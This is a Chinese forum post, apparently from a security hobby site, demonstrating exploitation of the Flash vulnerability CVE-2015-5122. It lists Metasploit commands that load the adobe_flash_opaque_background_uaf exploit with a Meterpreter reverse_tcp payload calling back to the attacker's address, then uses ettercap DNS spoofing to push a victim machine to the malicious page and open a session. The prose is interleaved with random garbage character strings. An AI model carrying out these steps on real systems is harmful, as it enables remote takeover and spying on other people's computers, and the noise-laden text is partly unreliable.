cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

; s2 E( N6 a* ^ 二、cve2015-5122漏洞实例演示虚拟机 ! D9 B! b& J' E) z' ~

/ G4 R [6 Y1 s, A1 r' ^ 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： % O. o, u: I( R: a3 v

_% ]9 J5 c h6 h" G2 w) S+ b search cve-2015-5122如图： - k& R) u$ N: l, x. R5 o

, a C M2 P b2 Q ]1 O! x9 O 4 n4 ?9 u' N: N9 i" F

) D( G3 f3 c* L8 N, j& X. T 下面我们敲如下命令： ' u" G% X- y+ w; X' Q5 l& ]" n

& b* `( B/ J8 v. M+ N use exploit/multi/browser/adobe_flash_opaque_background_uaf * @, Z! w& m; b

! |1 D5 R: A+ R set PAYLOAD windows/meterpreter/reverse_tcp $ q: _. V; \, X

- @% \/ Z3 H- { X set LHOST 192.168.0.109 ; l3 L* z" M8 b- l/ t6 c

4 M8 ~/ F/ D0 C1 J set URIPATH / /*根目录*/ 4 q' B+ i5 B# [% }

( q; Q7 F4 f4 y set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 & ]* K, o8 d; ]& b

: m4 D$ m) B+ n; Y+ ]$ X. F7 U set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 5 Q3 q% w k2 x9 ?% Y; I

) _& z$ g% o) w; {/ L0 X" @ 然后show options如图： ! C- G/ x5 x+ L1 n

/ p, i- N$ `8 J/ T- e 6 {9 E" ]2 N+ [7 w# _2 K" Y# Z1 n

% J' I7 ?1 y7 j+ g+ X 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
* \- H" d( E& _) O4 ? & A6 Z& F% L6 L) p- S

6 J3 c% F2 z* P, f3 M+ l! N 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 & ]4 A5 D2 Z* {( n9 O0 x3 e

% z7 t7 i2 T" o* g Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf - _. D0 `& d6 t7 u& p3 ]( m6 o* h8 I

+ k5 A8 w F& P, k# l6 t ) b; o* d1 f/ `+ ?8 \8 J( @9 B

" I8 X' }) U& P# i 成功了，这时候我们断开ettercap，如图： & [, }5 H2 ?0 P* G# `

. u, z o0 l3 x8 L* s4 h , c; ]! q& G' o1 `% d1 O- r, e

9 m# n% f- i' U6 V Screenshot如图： ' U) c1 J& x4 q7 i

+ u; e( X1 k# d8 \! o$ J) a4 x) q2 A & I; @" p7 ]5 R! F0 ^& E

- S+ M/ E& e! T& I! R3 G: u) z ; T, s9 Y; ^' n* P9 ?

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块